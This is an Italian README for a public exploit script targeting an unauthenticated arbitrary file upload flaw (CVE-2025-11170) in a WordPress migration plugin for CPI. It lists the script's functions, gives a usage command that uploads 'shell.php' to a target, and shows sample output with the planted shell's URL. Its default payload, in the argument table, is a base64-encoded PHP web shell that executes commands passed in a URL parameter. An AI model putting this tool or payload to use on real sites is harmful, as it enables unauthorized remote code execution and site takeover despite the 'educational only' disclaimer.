
Plugin dedicato alla migrazione WP per CPI <= 1.0.2 - Caricamento arbitrario di file non autenticato
WP移行専用プラグイン for CPI <= 1.0.2 - Caricamento Arbitrario di File non Autenticato
Il plugin WP移行専用プラグイン for CPI per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file nella funzione Cpiwm_Import_Controller::import in tutte le versioni fino alla 1.0.2 inclusa.
Ciò consente ad attaccanti non autenticati di caricare file arbitrari sul server del sito interessato, potenzialmente permettendo l'esecuzione remota di codice.
CVE-2025-11170.pyNxploited_parse_args
Analizza e valida gli argomenti di input. Assicura la corretta struttura dell'endpoint, le intestazioni e la codifica dei dati.
Nxploited_logging
Imposta la registrazione avanzata e la verbosità per un output dettagliato o minimo.
Nxploited_retry_session
Inizializza una sessione persistente con logica di ripetizione e backoff per comunicazioni resilienti.
Nxploited_build_payload
Costruisce i parametri della richiesta POST per lo sfruttamento.
Nxploited_send
Esegue la richiesta POST effettiva all'endpoint vulnerabile e gestisce le risposte/errori.
Nxploited_output_result
Elabora e formatta la risposta, mostrando il percorso della shell in caso di successo, o informazioni di debug altrimenti.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Esempio di Output:
Caricamento shell...
Elaborazione risposta...
[+] Caricamento riuscito!
Percorso shell:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
Il mio GitHub: https://github.com/Nxploited
Questo script è fornito solo a scopo educativo.
L'uso di questo exploit su target senza autorizzazione adeguata può essere illegale.
L'autore non si assume NESSUNA responsabilità per qualsiasi uso improprio, danno o conseguenza legale.
GitHub: Nxploited
Telegram: KNxploited
Di: Nxploited (Khaled Alenazi)
| Argomento | Descrizione |
|---|
-u, --url | URL di destinazione base (es., http://target.com/wordpress/). Lo script aggiunge automaticamente wp-admin/admin-ajax.php. |
-f, --filename | Nome del file o shell da caricare. Predefinito: shell.php |
-d, --data | Contenuto del file in base64 (o testo normale). Predefinito: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Valore del campo indice. Predefinito: 0 |
-H, --headers | Intestazioni HTTP aggiuntive (formato: X-Key:Value;K2:Value2) |
-t, --timeout | Timeout per la richiesta HTTP (secondi). Predefinito: 10 |
--retries | Numero di tentativi. Predefinito: 3 |
--backoff | Fattore di backoff tra i tentativi (secondi). Predefinito: 0.7 |
-v, --verbose | Aumenta la verbosità per il debug (ripetibile) |